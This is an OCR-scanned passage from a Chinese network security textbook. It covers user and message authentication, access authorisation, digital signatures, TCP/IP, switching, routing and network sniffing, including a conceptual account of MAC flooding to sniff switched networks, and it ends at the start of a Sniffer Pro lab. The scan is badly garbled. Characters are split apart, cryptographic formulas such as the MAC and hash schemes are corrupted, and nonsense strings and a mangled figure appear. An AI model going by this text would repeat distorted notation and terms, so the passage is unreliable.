份 认证 方法 。 但 目前 还 没有 哪 种 生物 认证 方法 可 以 保证 100% 的 正确 率 。 因 此 ,提高 识别 
算法 和 硬件 水 平 是 保证 正确 率 的 一 个 重点 。 

2. 非 生物 认证 技术 

非 生物 认证 技术 一 般 采 用 口令 的 认证 方式 ,而 传统 的 认证 方式 是 使 用 口令 认证 。 口 令 
认证 方法 具有 简单 .操作 方便 等 特点 。 认 证 者 首先 需要 拥有 用 户 使 用 账号 ,还 需要 保证 账号 
在 用 户 数据 库 里 是 唯一 的 。 主 要 有 两 种 口令 认证 方式 : 一 种 是 使 用 动态 口令 ,用 户 在 使 用 
网 络 安全 系统 的 时 候 , 所 需要 输入 的 口令 是 变化 的 ,不 是 固定 的 ,就 算 这 次 输入 口令 被 他 人 
获得 ,下 次 也 不 能 使 用 ; 另 一 种 是 静态 口令 ,使 用 者 经 过 系统 设置 和 保存 后 ,在 指定 时 间 内 不 
会 发 生变 化 ,一 个 口令 可 以 长 期 使 用 ,这 种 口令 较 动态 口令 操作 简单 ,但 没有 动态 口令 安全 。 

3. 多 因素 认证 

结合 各 类 因素 认证 技术 ,增强 身份 认证 的 安全 性 。 目 前 手机 短信 认证 和 Web 口令 认证 
已 在 网 络 安全 中 得 到 应 用 ,并 获得 了 不 错 的 口碑 。 


2.5.2 报 文 认证 


报 文 认证 是 通过 网 络 中 交换 与 传输 的 数据 单元 进行 认证 的 一 种 方式 。 报 文 的 认证 方式 
有 传统 加 密 方式 认证 、 公 开 密 钥 密 码 方式 认证 ,Hash 函数 方式 认证 。 

1. 传统 加 密 方式 认证 

传统 加 密 的 方式 是 以 整个 报 文 的 密 文 为 认证 码 。 设 A 为 发 送 方 ,B 为 接收 方 。A 和 B 
FEE ARE NY RA Ks. A 的 标识 为 1D , 报 文 为 M, 在 报 文中 增加 标识 IDs. IBA B 认证 A 
的 过 程 如 下 。 


A > B:EUID,\\M.Ks) 

B 收 到 报 文 后 用 Ks 解密 , 若 解密 所 得 的 发 送 方 标识 与 IDA 相同 , 则 B 认为 报 文 是 A 
发 来 的 。 

公开 密 钥 密码 方式 认证 

通信 双方 共享 密 钥 K., A 利用 密 钥 KK 计算 认证 码 MAC ,将 报 文 M 和 MAC 一 块 发 给 

接收 方 。 
A — B:MNMAC 
接收 方 收 到 报 文 M 后 用 相同 的 密 钥 K 重新 计算 得 出 新 的 MAC ,并 将 其 与 接收 到 的 
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MAC 进行 比较 ,车 二 者 相等 , 则 认为 报 文正 确 、 真 实 。 该 方法 中 , 报 文 是 以 明文 形式 发 送 
的 ,所 以 该 方法 可 以 提供 认证 ,但 是 不 能 提供 保密 性 , 若 要 保密 ,可 在 MAC 算法 之 后 对 报 文 
进行 加 密 。 

A 一 B:E(M\\MAC,K,), 其 中 MAC=C(M.K,). 4A MB 共享 Ki 时 ,可 以 提供 认 
证 ; 当 A 和 B 共享 K, 时 ,可 以 提供 保密 。 

3. Hash 函数 方式 认证 

该 方法 是 将 任意 长 度 的 报 文 映 射 为 定 长 的 Hash 值 的 公共 函数 ,以 Hash 值 作为 认证 
码 。 具 体形 式 如 下 。 

A- B: <M || ECHash( MD ,K) > 

M 是 变 长 的 报 文 ,HashCM) 是 定 长 的 Hash 值 。 发 送 方 生成 报 文 M 的 Hash VD ,并 用 
传统 密码 对 其 加 密 , 将 加 密 后 的 结果 附 于 M 之 后 发 给 接收 方 。 接 收 方 B 由 M 重新 计算 
Hash(M) ,并 与 接收 到 的 结果 进行 比较 ,由 于 Hash(M) 受 密码 保护 ,所 以 B 通过 比较 
Hash(M) 可 认证 报 文 的 真实 性 和 完整 性 。 


2.5.3 访问 授权 


授权 指定 该 用 户 能 做 什么 ,通常 是 建立 一 种 对 资源 的 访问 方式 ,如 文件 和 打印 机 ,授权 
也 能 处 理 用 户 在 系统 或 者 网 络 上 的 特权 。 那 么 ,什么 是 网 络 安全 中 的 用 户 权 限 呢 ?特权 与 
用 户 权 限 的 权限 不 同 。 用 户 权限 提供 授权 去 做 可 以 影响 整个 系统 的 事情 。 可 以 创建 组 ,把 
用 户 分 配 到 组 ,登录 系统 。 其 他 的 用 户 权限 是 隐 含 的 ,默认 分 配给 组 一 一 由 系统 创建 的 组 ， 
而 不 是 管理 员 创建 的 组 ,无 法 移 除 这 些 权 限 。 授 权 一 般 基 于 以 下 方式 。 

1. 基于 角色 的 授权 (RBAC) 

早期 计算 机 系统 存在 的 两 个 角色 是 用 户 和 管理 员 。 早 期 的 系统 针对 这 些 类 型 的 用 户 ， 
基于 他 们 的 组 成 员 关系 定义 角色 和 授权 的 访问 。 授 予 管理 员 ( 超 级 用 户 ,root 用 户 , 系 统管 
理 员 等 ) 特权 ,并 允许 其 比 普通 用 户 访问 更 多 的 计算 机 资源 。 例 如 ,管理 员 可 以 增加 用 户 ， 
分 配 密码 ,访问 系统 文件 和 程序 ,并 重启 机 器 。 这 个 群体 后 来 扩展 到 包括 审计 员 的 角色 (用 
户 可 以 读 取 系统 信息 和 在 其 他 系统 上 的 活动 信息 ,但 不 能 修改 系统 数据 或 执行 其 他 管理 员 
角色 的 功能 ) 。 

随 着 系统 的 发 展 ,用 户 角色 更 加 精细 化 ,用 户 可 以 通过 安全 许可 量化 。 例 如 ,允许 访问 
特定 的 数据 或 某 些 应 用 程序 。 其 他 区 别 可 能 基于 用 户 在 数据 库 或 者 其 他 应 用 系统 中 的 角色 
而 定 。 通 常情 况 下 ,角色 巾 部 门 分 配 , 如 财务 .人 力 资源 、 信 息 技术 和 销售 部 门 。 

2. 访问 控制 列表 (ACL) 

信息 系统 可 能 也 可 以 使 用 ACL 确定 请 求 的 服务 或 资源 是 否 有 权限 。 访 问 服务 器 上 的 
文件 通常 由 保留 在 每 个 文件 的 信息 所 控制 。 同 样 ,网 络 设备 上 不 同类 型 的 通信 也 可 以 通过 
ACL 控制 。 

3. 基于 规则 的 授权 

基于 规则 的 授权 需要 开发 一 套 规则 规定 特定 的 用 户 在 系统 上 能 做 什么 。 这 些 规则 可 能 
会 提供 如 下 信息 ,如 “用 户 Alice 能 够 访问 资源 Z, 但 不 能 访问 资源 D”, 更 复杂 的 规则 是 指定 
组 合 ,如 “用 户 Bob 只 有 坐 在 数据 中 心 的 控制 台 时 ,才能 阅读 文件 P”。 在 小 的 系统 中 ,基于 
规则 的 授权 并 不 难 维护 ,但 是 在 大 的 系统 和 网 络 中 ,维护 基于 规则 的 授权 极其 烦琐 。 
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2.5.4 数字 签名 


数字 签名 是 利用 数字 技术 实现 在 网 络 传送 文件 时 ,附加 个 人 标记 ,达到 在 系统 上 手书 签 
名 盖 章 的 作用 ,以 表示 确认 、 负 责 、 经 手 等 。 数 字 签 名 (也 称 数 字 签 字 ) 是 实现 认证 的 重要 工 
具 , 在 电子 商务 系统 中 不 可 缺少 。 保 证 传递 文件 的 机 密 性 应 使 用 加 密 技 术 , 保 证 其 完整 性 应 
使 用 信息 摘要 技术 ,而 保证 其 认证 性 和 不 可 否认 性 应 使 用 数字 签名 技术 。 

数字 签名 技术 是 公开 密 钥 加 密 技术 和 报 文 分 解 函 数 相 结合 的 产物 。 与 加 密 不 同 ,数字 
签名 的 目的 是 为 了 保证 信息 的 完整 性 和 真实 性 。 数 字 签 名 必须 保证 以 下 3 点 。 

(1) 接收 者 能 够 核实 发 送 者 对 消息 的 签名 。 

(2) 发 送 者 事后 不 能 抵赖 对 消息 的 签名 。 

(3) 接收 者 不 能 伪造 对 消息 的 签名 。 

数字 签名 可 以 解决 接收 者 伪造 发送 者 或 接收 者 否认 、 第 三 方 冒充 发 送 或 接收 文件 、 接 
收 者 算 改 等 问题 。 数 字 签 名 可 以 分 为 RSA 签名 体制 .EIGamal 签名 体制 、 育 签名 、 双 联 签 
名 ,无 可 争辩 签名 等 。 
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第 3 音 网 络 分 析 实 验 


3.1 网 络 分 析 原 理 


3.1.1 TCP/IP 原理 


TCP/IP 是 一 个 4 层 协议 系统 ,TCP/IP 是 一 组 不 同 的 协议 组 合 在 一 起 构成 的 协议 族 。 

CD 数据 发 送 时 自 上 而 下 , 层 层 加 码 ;数据 接收 时 自 下 而 上 , 层 层 解码 。 

如 图 3. 1. 1 所 示 , 当 应 用 程序 用 TCP 传送 数据 时 ,数据 被 送 入 协议 栈 中 ,然后 逐 层 通 
过 ,直到 被 当 作 一 串 比 特 流 送 入 网 络 。 每 一 层 对 收 到 的 数据 都 要 增加 一 些 首部 信息 (有 时 还 
要 增加 尾部 信息 )。TCP 传 给 IP 的 数据 单元 称 作 TCP 报 文 段 。IP 传 给 网 络 接口 层 的 数据 
单元 称 作 IP 数据 报 。 通 过 以 太 网 传输 的 比特 流 称 作 帧 。 


用 户 数据 
| | 应 用 程序 
APT | 用 户 数据 | 
i i TCP 
TCP 首 部 | 应 用 数据 | 
1 TCP 段 i P 
[首部 “| TCP 首 部 | 应 用 数据 | 
e IP 数 据 报 e 以 太 网 
i 驱动 程序 
KAM) Ip 首 部 | TCP 首 部 | 应 用 数据 PAM 一 
首部 尾部 | 一 
以 太 网 
14 20 20 4 
- 以 太 网 由 -| 
46-1500 B ——— — —- 
图 311 OPRA 


(2) 逻辑 通信 在 同 层 完成 。 

数据 沿 垂直 方向 ( 即 数据 在 各 层 间 依次 传递 ) 传 递 是 当今 人 们 普遍 认可 的 数据 处 理 的 功 
能 流程 。 每 一 层 都 有 与 其 相 邻 层 的 接口 。 为 了 通信 ,系统 必须 在 各 层 之 间 传 递 数据 、 指 令 、 
地 址 等 信息 ,通信 的 逻辑 流程 与 真正 的 数据 流 不 同 ,虽然 通信 流程 垂直 通过 各 层次 ,但 每 一 
层 逻 辑 上 都 能 够 与 远程 计算 机 系统 的 相应 协议 层 直接 通信 。 如 图 3. 1. 2 所 示 ,通信 实际 上 
是 按 垂直 方向 进行 的 ,但 在 逻辑 上 通信 和 是 在 同 层 进行 的 。 


3.1.2 交换 技术 


所 谓 交 换 , 就 是 将 分 组 (或 帧 ) 从 一 个 端口 转移 到 另 一 端口 的 动作 。 交 换 机 在 操作 过 程 
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图 312 逻辑 通信 结构 


中 会 不 断 地 收集 资料 建立 它 本 身 的 一 个 地 址 表 ,MAC 地 址 表 显示 了 主机 的 MAC 地 址 与 以 
太 网 交换 机 端口 的 映射 关系 ,指出 数据 帧 去 往 的 目标 主机 。 

当 以 太 网 交换 机 收 到 一 个 数据 帧 时 ,将 数据 帧 的 目的 MAC 地 址 与 MAC 地 址 表 进 行 
查找 匹配 。 如 果 在 MAC 地 址 表 中 没有 相应 的 匹配 项 , 则 向 除 接收 端口 外 的 所 有 端口 广播 
该 数据 帧 。 当 MAC 地 址 表 中 有 匹配 项 时 ,该 匹配 项 指定 的 交换 机 端口 与 接收 端口 相同 则 
表明 该 数据 帧 的 目的 主机 和 源 主机 在 同一 广播 域 中 ,不 通过 交换 机 可 以 完成 通信 ,交换 机 将 
丢弃 该 数据 帧 。 和 否则 ,交换 机 把 该 数据 帧 转发 到 相应 的 端口 。 

交换 机 检查 收 到 数据 帧 的 源 MAC 地 址 ,并 查找 MAC 地 址 表 中 与 之 匹配 的 项 。 如 果 
没有 ,交换 机 将 记录 该 MAC 地 址 和 接收 该 数据 帧 的 端口 ,并 激活 一 个 定时 器 。 这 个 过 程 被 
称 作 地 址 学 习 ; 如 果 接 收 的 数据 帧 的 源 MAC 地 址 在 地 址 表 中 有 匹配 项 ,交换 机 将 复位 该 地 
址 的 定时 器 。 如 果 交 换 机 不 能 正确 学 习 MAC 地 址 , 则 有 可 能 造成 数据 包 丢 失 以 及 泛 洪 现 
象 的 发 生 ,影响 交换 机 的 转发 性 能 。 

局 域 网 交换 技术 作为 对 共享 式 局 域 网 提供 有 效 网 段 划 分 的 解决 方案 ,可 以 使 用 户 尽 可 
能 地 分 享 到 最 大 带宽 。 交 换 技术 在 OSI 参考 模型 中 的 第 二 层 , 即 在 数据 链 路 层 进行 操作 ， 
交换 机 对 数据 包 的 转发 建立 在 MAC 地 址 基础 上 ,对 于 IP 网 络 协议 来 说 , 它 是 透明 的 , 即 交 
换 机 在 转发 数据 包 时 ,无 须知 道 信 源 机 和 目标 机 的 IP 地 址 ,只 知 其 物理 地 址 即 可 。 


3.1.3 路 由 技术 


路 由 是 指 通过 相互 连接 的 网 络 把 信息 从 源 地 点 移动 到 目标 地 点 的 过 程 。 在 路 由 过 程 
中 ,信息 至 少 会 经 过 一 个 或 多 个 中 间 节 点 。 路 由 和 交换 实现 的 功能 类 似 , 但 它们 二 者 的 区 别 
是 明显 的 ,交换 发 生 在 OSI 参考 模型 的 第 二 层 ( 数 据 链 路 层 ) ,而 路 由 发 生 在 第 三 层 , 即 网 络 
层 。 这 一 区 别 决定 了 路 由 和 交换 在 传输 信息 的 过 程 中 需要 使 用 不 同 的 控制 信息 。 

当 IP 子 网 中 的 一 台 主 机 发 送 IP 分 组 给 同一 子 网 的 另 一 台 主 机 时 , 它 直 接 把 IP 分 组 送 
到 网 络 上 ,对方 就 能 收 到 。 当 发 送 给 不 同 子 网 上 的 主机 时 , 它 要 选择 一 个 能 到 达 目 的 子 网 上 
的 路 由 器 ,把 IP 分 组 传递 给 该 路 由 器 ,由 路 由 器 负责 把 TP 分 组 送 到 目的 地 。 如 果 没 有 这 样 
的 路 由 器 ,主机 就 把 IP 分 组 送 给 一 个 被 称 为 默认 网 关 ” 的 路 由 器 。“ 默 认 网 关 ” 是 每 台 主机 
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上 的 一 个 配置 参数 , 它 是 同一 个 网 络 上 的 某 个 路 由 器 端口 的 IP 地 址 。 

同 主机 一 样 , 路 由 器 也 要 判定 端口 连接 的 是 否 为 目的 子 网 ,如 果 是 ,就 直接 把 分 组 通过 
端口 送 到 网 络 上 ,否则 也 要 选择 下 一 个 路 由 器 传送 分 组 。 路 由 器 也 有 它 的 默认 网 关 , 用 来 传 
送 IP 分 组 ,通过 逐 级 传送 ,IP 分 组 最 终 将 送 到 目的 地 ,否则 IP 分 组 被 网 络 丢 弃 。 

路 由 器 不 仅 负责 IP 分 组 转发 ,还 需 与 其 他 路 由 器 联络 ,确定 网 络 的 路 由 选择 和 维护 路 
由 表 。 路 由 包含 两 个 基本 动作 : 选择 最 佳 路 径 和 通过 网 络 传输 信息 。 在 路 由 过 程 中 ,后 者 
也 称 为 (数据 ) 交 换 。 交 换 相对 来 说 比较 简单 ,而 选择 最 佳 路 径 很 复杂 。 

路 径 选 择 是 判定 到 达 目 的 地 的 最 佳 路 径 , 由 路 由 选择 算法 实现 。 由 于 会 涉及 不 同 的 路 
由 选择 协议 和 路 由 选择 算法 ,所 以 相对 复杂 一 些 。 为 了 判定 最 佳 路 径 , 路 由 选择 算法 必须 启 
动 并 维护 包含 路 由 信息 的 路 由 表 , 其 中 路 由 信息 依赖 于 所 用 的 路 由 选择 算法 。 

Metric 是 路 由 算法 用 以 确定 到 达 目 的 地 的 最 佳 路 径 的 计量 标准 。 路 由 算法 根据 许多 
信息 填充 路 由 表 。 路 由 器 查看 了 数据 包 的 目的 协议 地 址 后 ,确定 是 否 知道 如 何 转发 该 包 , 如 
果 路 由 器 不 知道 如 何 转发 ,通常 就 将 之 丢弃 。 如 果 路 由 器 知道 如 何 转 发 ,就 把 目的 物理 地 址 
变 成 下 一 跳 的 物理 地 址 并 向 之 发 送 。 下 一 跳 可 能 就 是 最 终 的 目的 主机 ,如 果 不 是 ,通常 为 另 
一 个 路 由 器 , 它 将 执行 同样 的 步骤 。 


3.1.4 网 络 嗅 探 技 术 


1. 嗅 探 技 术 简 介 

嗅 探 Csniffer) 技 术 是 一 种 重要 的 网 络 安全 攻防 技术 。 对 黑客 来 说 ,通过 嗅 探 技术 能 以 
非常 隐蔽 的 方式 摆 取 网 络 中 的 大 量 敏感 信息 ,与 主动 扫描 相 比 , 嗅 探 行为 更 难 被 察觉 ,也 更 
容易 操作 。 对 安全 管理 人 员 来 说 ,借助 嗅 探 技术 ,可 以 对 网 络 活动 进行 实时 监控 ,发 现 各 种 
网 络 攻击 行为 。 嗅 探 技 术 最 初 作为 网 络 管理 员 检 测 网 络 通信 的 必 备 技术 , 既 可 以 是 软件 ,又 
可 以 是 一 个 硬件 设备 。 软 件 Sniffer 应 用 方便 ,针对 不 同 的 操作 系统 平台 有 多 种 不 同 的 软件 
Sniffer; 硬 件 Sniffer 通常 被 称 作协 议 分 析 器 ,其 价格 一 般 都 很 高 。 

在 局 域 网 中 ,以 太 网 的 共享 式 特性 决定 了 嗅 探 能 够 成 功 。 因 为 以 太 网 是 基于 广播 方式 
传送 数据 的 ,所 有 的 物理 信号 都 会 被 传送 到 每 一 个 主机 节点 ,此 外 ,网 卡 可 以 被 设置 成 混杂 
接收 模式 ,在 这 种 模式 下 ,无 论 监听 到 的 数据 帧 目的 地 址 如 何 ,网 卡 都 能 予以 接收 。 而 
TCP/IP 栈 中 的 应 用 协议 大 多 数 明文 在 网 络 上 传输 ,这 些 明 文 数 据 中 往往 包含 一 些 敏 感 信 
息 ( 如 密码 .账号 等 ) ,使 用 Sniffer 可 以 监听 到 所 有 局 域 网 内 的 数据 通信 ,并 得 到 这 些 敏感 
信息 。 

Sniffer 的 隐蔽 性 好 , 它 只 是 被 动 接收 数据 ,不 向 外 发 送 数据 ,所 以 在 传输 数据 过 程 中 ， 
根本 无 法 觉察 。Sniffer 的 局 限 性 是 只 能 在 局 域 网 的 冲突 域 中 或 者 在 点 到 点 连接 的 中 间 节 
点 上 进行 监听 。 

2. 网 络 嗅 探 器 

网 络 嗅 探 器 在 当前 网 络 技术 中 使 用 得 非常 广泛 。 网 络 嗅 探 器 既 可 以 作为 网 络 故 障 的 诊 
断 工具 ,也 可 以 作为 监听 工具 。 传 统 的 网 络 嗅 探 技 术 是 被 动 地 监听 网 络 通信 、 用 户 名 和 口 
令 。 新 的 网 络 嗅 探 技 术 开 始 主动 地 控制 通信 数据 。 大 多 数 的 嗅 探 器 至 少 能 够 分 析 下 面 的 协 
W: 标准 以 太 网 .TCP/IP、IPX、DECNET 等 。 

根据 功能 不 同 , 嗅 探 器 可 以 分 为 通用 网 络 嗅 探 器 和 专用 嗅 探 器 。 前 者 支持 多 种 协议 ,如 
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tcpdump,Snifferit 等 ;后 者 一 般 针 对 特定 软件 或 提供 特定 功能 ,如 专门 针对 MSN 等 即时 通 
信 软 件 的 嗅 探 器 .专门 嗅 探 邮件 密码 的 嗅 探 器 等 。 

3. 嗅 探 技术 分 类 

根据 工作 环境 和 工作 原理 的 不 同 , 嗅 探 技术 又 可 以 分 为 本 机 嗅 探 、 广 播 网 嗅 探 、 交 换 机 
嗅 探 等 类 型 。 

1) 本 机 嗅 探 

本 机 嗅 探 是 指 在 某 台 计算 机 内 , 嗅 探 程序 通过 某 种 方式 ,获取 发 送 给 其 他 进程 的 数据 包 
的 过 程 。 例 如 , 当 邮 件 客户 端 在 收发 邮件 时 , 嗅 探 程 序 可 以 窃听 到 所 有 的 交互 过 程 和 其 中 传 
递 的 数据 。 

2) 广播 网 嗅 探 

广播 网 基于 集线器 (Hub) 的 局 域 网 络 , 其 工作 原理 是 基于 总 线 方式 的 ,所 有 的 数据 包 在 
该 网 络 中 都 会 被 广播 发 送 ( 即 发 送 给 所 有 端口 )。 在 广播 网 中 ,每 一 个 网 络 数 据 包 都 被 发 送 
到 所 有 的 端口 ,然后 由 各 端口 连接 的 网 卡 判断 是 否 需要 接收 ,所 有 目的 地 址 与 网 卡 实际 地 址 
不 符 的 数据 包 将 被 网 卡 驱动 自动 丢弃 ,这 确保 了 广播 网 中 每 台 主 机 只 接收 到 以 自己 为 目标 
的 数据 包 。 

广播 网 嗅 探 利 用 了 广播 网 “共享 ”的 通信 方式 。 在 广播 网 中 ,所 有 的 网 卡 都 会 收 到 所 有 
的 数据 包 , 只 要 将 本 机 网 卡 设 为 混杂 模式 ,就 可 以 使 嗅 探 工具 支持 广播 网 或 多 播 网 的 嗅 探 。 

3) 交换 机 嗅 探 

交换 机 的 工作 原理 与 Hub 不 同 , 它 不 再 将 数据 包 转 发 给 所 有 端口 ,而 是 通过 “分 组 交 
换 ” 的 方式 进行 单 对 单 的 数据 传输 , 即 交 换 机 能 记 住 每 个 端口 的 MAC 地 址 ,根据 数据 包 的 
目的 地 址 选择 目的 端口 ,只 有 对 应 该 目的 地 址 的 网 卡 能 接收 到 数据 。 

基于 交换 机 的 嗅 探 是 指 在 交换 环境 中 通过 某 种 方式 进行 的 嗅 探 。 由 于 交换 机 基于 “分 
组 交换 ”的 工作 模式 ,因此 ,简单 地 将 网 卡 设 为 “混杂 ”模式 并 不 能 嗅 探 到 网 络 上 的 数据 包 , 必 
须 采 用 其 他 方法 实现 基于 交换 机 的 嗅 探 。 

DE 端口 镜像 嗅 控 

端口 镜像 也 称 作 巡回 分 析 端 口 (roving analysis port) , 它 从 网 络 交换 机 的 一 个 端口 转发 
每 个 进出 分 组 的 副本 到 另 一 个 端口 ,分 组 将 在 此 端口 进行 分 析 ,端口 镜 像 是 监视 网 络 通信 量 
和 通信 内 容 的 一 种 方法 。 网 络 管理 员 将 端口 镜像 作为 一 种 诊断 或 调试 的 工具 ,尤其 是 在 分 
析 网 络 情况 的 时 候 , 它 使 管理 员 能 跟踪 交换 机 的 性 能 ,并 在 必要 时 对 其 进行 更 改 。 

端口 镜像 是 交换 机 为 调试 预 留 的 功能 。 通 过 端口 镜像 ,可 以 将 交换 机 中 任意 端口 的 数 
据 复制 给 镜像 端口 。 通 过 端口 镜像 ,本 机 嗅 探 工具 就 可 以 嗅 探 交换 机 上 的 任意 端口 了 。 

基于 端口 镜像 的 嗅 探 受 限 于 交换 机 能 够 支持 的 镜像 功能 ,能 够 镜像 多 少 端口 ,镜像 出 来 
的 协议 如 何 都 取决 于 交换 机 的 型 号 和 配置 。 由 于 进行 基于 端口 镜像 的 嗅 探 必须 拥有 交换 机 
的 管理 权限 ,因此 ,基于 端口 镜像 的 嗅 探 往往 是 网 络 管理 员 常 用 的 嗅 探 方式 。 

5) 通过 MAC 泛滥 进行 交换 机 嗅 探 

这 种 方式 往往 被 攻击 者 使 用 。 网 络 交换 机 为 了 能 够 进行 分 组 交换 ,必须 在 内 部 维护 一 
个 转换 表 , 将 不 同 的 MAC 地 址 转换 成 交换 机 上 的 物理 端口 。 由 于 交换 机 的 工作 内 存 有 限 ， 
如 果 用 虚假 的 MAC 地 址 对 交换 机 不 断 进行 攻击 ,直到 交换 机 的 工作 内 存 被 占 满 , 交 换 机 就 
进入 了 所 谓 的 “打开 失效 ”模式 ,开始 了 类 似 于 集线器 的 工作 方式 ,向 网 络 上 所 有 的 机 器 广播 
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数据 包 。 在 这 种 情况 下 ,交换 机 嗅 探 同样 可 以 采用 广播 网 嗅 探 的 方式 实现 。 

4. 嗅 探 的 安防 作用 

D 网 络 安全 审计 

网 络 安全 审计 是 指 通过 网 络 嗅 探 工具 ,将 网 络 数据 包 捕获 ,解码 并 加 以 存储 ,以 备 后 期 
查询 或 提供 即时 报警 。 通 过 嗅 探 技 术 ,网络 安 全 审计 可 以 实现 上 网 行为 审计 、 网 络 违规 数据 
的 监控 等 功能 。 利 用 网 络 嗅 探 技术 开发 的 网 络 行为 审计 类 软件 是 运行 在 关键 的 网 络 节点 ， 
对 网 络 传输 的 数据 流 进行 合法 性 检查 的 工具 。 

2) 蠕虫 病毒 的 控制 

采用 嗅 探 技术 ,对 蠕虫 病毒 的 控制 可 起 到 以 下 作用 。 

(1) 基于 网 络 嗅 探 的 流量 检测 ,及 时 发 现 网 络 流量 异常 ,并 根据 已 经 建成 的 流量 异常 模 
型 初步 判断 出 网 络 蠕虫 病毒 爆发 的 前 兆 。 

(2) 基于 网 络 嗅 探 的 网 络 协议 分 析 , 进 一 步 确认 蠕虫 病毒 的 发 作 , 并 及 时 给 出 预警 
信息 。 

(3) 基于 网 络 嗅 探 技 术 的 蜜 镀 , 尽 早 捕获 蠕虫 病毒 的 样本 ,并 通过 对 其 进行 详细 的 分 
析 , 制 定 出 有 效 的 防御 方案 和 清除 方案 。 

(4) 通过 基于 网 络 嗅 探 技 术 的 入 侵 检 测 ,能 够 准确 定位 局 域 网 络 中 的 蠕虫 病毒 传播 源 ， 
从 而 及 时 扼杀 病毒 蠕虫 的 传播 行为 。 

3) 网 络 布控 与 追踪 

针对 网 络 犯罪 ,如 黑客 和 人 侵 .拒绝 服务 攻击 等 ,通过 嗅 探 技 术 进 行 追踪 ,协助 执法 部 门 定 
位 网 络 犯罪 分 子 。 现 代 网 络 犯罪 往往 采用 跳板 进行 , 即 通过 一 台中 间 主 机 进行 网 络 攻击 和 
犯罪 活动 ,这 对 犯罪 分 子 的 捕获 造成 了 很 大 的 障碍 ,而 嗅 探 技术 可 以 有 效 地 帮助 执法 人 员 解 
决 这 一 问题 。 

网 络 追踪 是 针对 伪造 IP 地 址 攻击 的 一 种 追查 方法 。 由 于 网 络 攻击 往往 采用 虚假 的 IP 
地 址 (特别 是 大 规模 的 拒绝 服务 攻击 ) ,因此 ,从 被 攻击 机 嗅 探 获取 的 数据 无 法 直接 判断 攻击 
源 , 需 要 采用 移动 的 网 络 嗅 探 器 ,以 溯源 的 方式 从 终点 逐个 前 溯 ,直到 发 现 攻击 的 起 源 点 。 

当 发 现 某 网 络 犯罪 行为 是 通过 中 间 跳 板 主机 进行 时 ,暂时 不 对 该 主机 进行 明显 的 操作 ， 
而 是 运行 网 络 嗅 探 器 对 其 进行 24 小 时 监控 ,一 旦 犯罪 分 子 远程 登录 该 主机 ,网 络 嗅 探 器 就 
会 记录 该 犯罪 分 子 的 IP 地址 ,从 而 协助 定位 和 和 追踪。 目前 ,国内 已 经 有 多 个 通过 网 络 布控 
和 追踪 的 方式 抓获 犯罪 分 子 的 案例 ,其 中 涉及 嗅 探 技 术 的 应 用 。 

4) 网 络 取证 

基于 嗅 探 的 网 络 取 证 工具 可 以 运行 在 需要 取证 的 犯罪 分 子 使 用 的 计算 机 上 (如 个 人 计 
算 机 或 公共 场所 的 计算 机 ) ,并 可 以 将 该 犯罪 分 子 的 网 络 行为 (如 邮件 、 聊 天 信息 、 上 网 记录 
等 ) 加 以 实时 记录 ,从 而 协助 案件 的 侦破 和 起 诉 证 据 的 获取 。 为 了 确保 利用 嗅 探 工具 获得 的 
网 络 证 据 具 备 不 可 算 改 性 ,网 络 取证 工具 中 还 需要 内 置 数字 签名 工具 ,防止 操作 人 员 人 为 修 
改 或 误 删 数字 证 据 。 

嗅 探 技 术 在 黑客 攻防 技术 及 信息 安全 体系 建设 中 都 起 到 了 非常 重要 的 作用 ,而 反 嗅 控 
技术 也 是 确保 网 络 私密 性 的 关键 之 一 。 同 时 , 嗅 探 技术 在 网 络 安全 管理 工作 中 也 具有 很 大 
的 帮助 。 但 是 ,在 进行 嗅 探 技术 的 合法 应 用 的 同时 ,还 需要 关注 嗅 探 技术 滥用 带 来 的 泄密 和 
破坏 个 人 隐私 问题 。 未 来 , 随 着 网 络 技术 的 发 展 , 嗅 探 技 术 和 反 嗅 探 技 术 还 将 不 断 进 步 , 目 
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前 在 高 速 化 .可 视 化 .针对 加 密 的 嗅 探 和 无 线 切入 技术 4 个 方向 上 都 可 以 看 到 新 技术 。 


3.2 网 络 分 析 基 础 实验 


3.2.1 Sniffer Pro 简介 


Sniffer Pro 软件 是 NAI 公司 推出 的 功能 强大 的 协议 分 析 软 件 。 利 用 Sniffer Pro 网 络 
分 析 器 的 强大 功能 和 特征 ,解决 网 络 问题 。 本 书 使 用 的 软件 版 本 为 Sniffer Pro_4_70_530。 

Sniffer Pro 软件 的 主要 作用 可 以 体现 在 以 下 6 个 方面 。 

A) Sniffer 可 以 评估 业务 运行 状态 ,如 各 种 应 用 的 响应 时 间 , 一 个 操作 需要 的 时 间 、 应 
用 带宽 的 消耗 、 应 用 的 行为 特征 、 应 用 性 能 的 瓶颈 等 。 

(2) Sniffer 能 够 评估 网 络 的 性 能 ,如 各 链 路 的 使 用 率 、 网 络 性 能 趋势 .消耗 最 多 带宽 的 
具体 应 用 消耗 最 多 带宽 的 网 络 用 户 、 各 分 支 机 构 的 流量 状况 .影响 网 络 性 能 的 主要 因素 。 

(3) Sniffer 可 以 快速 定位 故障 ,monitor、expert、decode 等 功能 都 可 以 快速 定位 故障 。 

(4) Sniffer 可 以 排除 潜在 的 威胁 ,如 病毒 、 木 马 、 扫 描 等 ,并 且 发 现 攻 击 的 来 源 ,为 控制 
提供 根据 ,对 类 似 蠕 虫 病毒 一 样 对 网 络 影响 大 的 病毒 有 效 。 作 为 即时 监控 工具 , Sniffer 通 
过 发 现 网 络 中 的 行为 特征 判断 网 络 是 否 有 异常 流量 ,所 以 Sniffer 发 现 病毒 的 速度 可 能 比 防 
病毒 软件 快 。 

(5) Sniffer 可 以 做 流量 的 趋势 分 析 ,通过 长 期 监控 ,可 以 发 现 网 络 流量 的 发 展 趋势 ,为 
将 来 的 网 络 改造 提供 建议 和 依据 。 

(6) 应 用 性 能 预测 。Sniffer 能 够 根据 捕获 的 流量 分 析 一 个 应 用 的 行为 特征 ,可 以 提供 
量化 的 预测 ,准确 率 较 高 ,误差 不 超过 1026. 

Sniffer 包括 了 4 大 功能 : 监控 (monitor) ,显示 (display) 数据 包 捕捉 (capture) 和 专家 
分 析 系 统 C(expert) 。 


3.2.2 程序 安装 实验 


实验 器 材 


Sniffer Pro 软件 系统 ,1 E. 
PCCWindows XP/Windows 7),1 台 。 


预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协议 有 关 的 内 容 。 
(2) 熟悉 实验 过 程 和 基本 操作 流程 。 
(3) 做 好 预习 报告 。 


实验 任务 


通过 本 实验 ,掌握 以 下 技能 。 
(1) 学 会 在 Windows 环境 下 安装 Sniffer。 
(2) 能 够 运用 Sniffer 捕获 报 文 。 
so 


实验 环境 

